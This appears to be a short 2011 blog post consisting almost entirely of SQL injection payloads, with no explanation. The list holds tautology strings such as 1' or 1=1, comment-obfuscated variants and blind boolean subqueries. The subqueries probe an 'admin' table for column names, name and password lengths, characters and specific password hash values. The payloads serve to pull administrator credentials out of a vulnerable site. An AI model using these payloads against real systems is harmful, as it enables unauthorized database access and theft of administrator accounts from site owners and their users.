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1' or 1=1  or ('1' = '1
1' or 1=1)  or '1' = '1
1' or 1=1 or '1' = '1
1'/**/or/**/1=1/**/or/**/'1'= '1

1' or 0<(select count(*) from admin) and '1' = '1

1' or 0<(select top 1 count(*) from admin where len(id)>0) and '1' = '1
1' or 0<(select top 1 count(*) from admin where len(name)>0) and '1' = '1
1' or 0<(select top 1 count(*) from admin where len(username)>0) and '1' = '1

1' or 1<(select top 1 count(*) from admin where len(name)>3 and id =1)  and '1' = '1
1' or 1<(select top 1 count(*) from admin where name = 'XXX' )  and '1' = '1

1' or 1=1 and (select top 1 abs(asc(mid(name,1,1))) from admin)>12635   and '1' = '1
1' or 1<(select top 1 count(*) from admin where len(userpass)=16) and '1' = '1
1' or 1<(select top 1 count(*) from admin where id > 1 and len(userpass)>0) and '1' = '1
1' or 1<(select top 1 count(*) from admin where userpass like '321665453993bc2a')  and '1' = '1
1' or 0<(select top 1 count(*) from admin where id = 3) and '1' = '1 正确
1' or 0<(select top 1 count(*) from admin where id = 3 and name = 'XXX') and '1' = '1
1' or 0<(select top 1 count(*) from admin where id = 3 and name = 'XXX' and userpass = '123665453993bc2a') and '1' = '1

posted on 2011-07-16 11:13  黄聪  阅读(1925)  评论(0编辑  收藏  举报